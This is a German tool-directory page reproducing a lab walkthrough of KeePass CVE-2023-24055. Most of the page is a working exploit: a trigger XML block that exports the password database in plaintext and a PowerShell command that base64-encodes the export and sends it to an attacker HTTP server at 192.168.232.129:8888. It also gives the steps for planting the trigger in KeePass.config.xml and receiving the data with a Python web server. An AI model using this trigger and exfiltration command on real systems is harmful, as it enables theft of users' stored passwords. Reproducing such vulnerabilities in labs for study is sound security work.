Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/zwlsix/keepass-cve-2023-24055
PasswortangriffeSchwachstellenanalyseExploitationDatenexfiltrationLernen & BildungLabs & Praxis
GitHubzwlsix/keepass-cve-2023-24055

KeePass-CVE-2023-24055

KeePass CVE-2023-24055 Reproduktion

Repository anzeigen
12vor 3 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

KeePass-CVE-2023-24055

KeePass CVE-2023-24055 Reproduktion KeePass CVE-2023-24055 Reproduktion

  1. Vorbereitung der Maschinen: Kali (192.168.232.129), Windows 10 (192.168.232.128)

  2. KeePass-Version: 2.53

Bild 1

  1. Prinzip: Durch Ändern der KeePass-Konfigurationsdatei KeePass.config.xml wird eine Trigger-Konfiguration hinzugefügt, die das Klartextpasswort exportiert und auf den Server des Angreifers hochlädt. Der XML-Code für den hinzugefügten Trigger lautet wie folgt:

Dabei legt das Feld <Parameter>c:\Users\Long\AppData\Local\Temp\exploit.xml</Parameter> den lokalen Pfad für den Export des Klartextpassworts fest.

Übertragen Sie die Passwortdatei mit PowerShell über die GET-Methode:

root@kitploit:~
<Parameter>PowerShell.exe</Parameter>
<Parameter>-ex bypass -noprofile -c $var=([System.Convert]::ToBase64String([System.IO.File]::ReadAllBytes('c:\Users\Long\AppData\Local\Temp\exploit.xml')));Invoke-WebRequest -uri http://192.168.232.129:8888/$var -Method GET </Parameter>
root@kitploit:~
<Triggers>
				<Trigger>
					<Guid>lztpSRd56EuYtwwqntH7TQ==</Guid>
					<Name>exploit</Name>
					<Events>
						<Event>
							<TypeGuid>s6j9/ngTSmqcXdW6hDqbjg==</TypeGuid>
							<Parameters>
								<Parameter>0</Parameter>
								<Parameter />
							</Parameters>
						</Event>
					</Events>
					<Conditions />
					<Actions>
						<Action>
							<TypeGuid>D5prW87VRr65NO2xP5RIIg==</TypeGuid>
							<Parameters>
								<Parameter>c:\Users\Long\AppData\Local\Temp\exploit.xml</Parameter>
								<Parameter>KeePass XML (2.x)</Parameter>
								<Parameter />
								<Parameter />
							</Parameters>
						</Action>
						<Action>
							<TypeGuid>2uX4OwcwTBOe7y66y27kxw==</TypeGuid>
							<Parameters>
								<Parameter>PowerShell.exe</Parameter>
								<Parameter>-ex bypass -noprofile -c $var=([System.Convert]::ToBase64String([System.IO.File]::ReadAllBytes('c:\Users\Long\AppData\Local\Temp\exploit.xml')));Invoke-WebRequest -uri http://192.168.232.129:8888/$var -Method GET </Parameter>
								<Parameter>False</Parameter>
								<Parameter>1</Parameter>
								<Parameter />
							</Parameters>
						</Action>
					</Actions>
				</Trigger>
			</Triggers>
  1. Ändern Sie die Datei KeePass.config.xml, fügen Sie die XML-Konfiguration hinzu und speichern Sie sie (Einfügeposition: innerhalb des Tags <TriggerSystem></TriggerSystem>). Öffnen Sie KeePass, um zu überprüfen, ob das Hinzufügen erfolgreich war:

tu2

  1. Öffnen Sie Kali und starten Sie mit dem Befehl python3 -m http.server 8888 einen Webdienst, um die exportierten Klartextpasswörter zu empfangen.

tu3

  1. Öffnen Sie KeePass, erstellen Sie einen neuen Eintrag und speichern Sie ihn. Der Trigger wird ausgelöst. Prüfen Sie den von Kali empfangenen Inhalt:

tu4

  1. Kopieren Sie den Inhalt in eine Datei und dekodieren Sie ihn mit Base64, um das Klartextpasswort zu erhalten.

tu5

tu6

Referenzartikel: https://github.com/alt3kx/CVE-2023-24055_PoC

https://www.youtube.com/watch?v=tqK1bns51ek

Tool herunterladen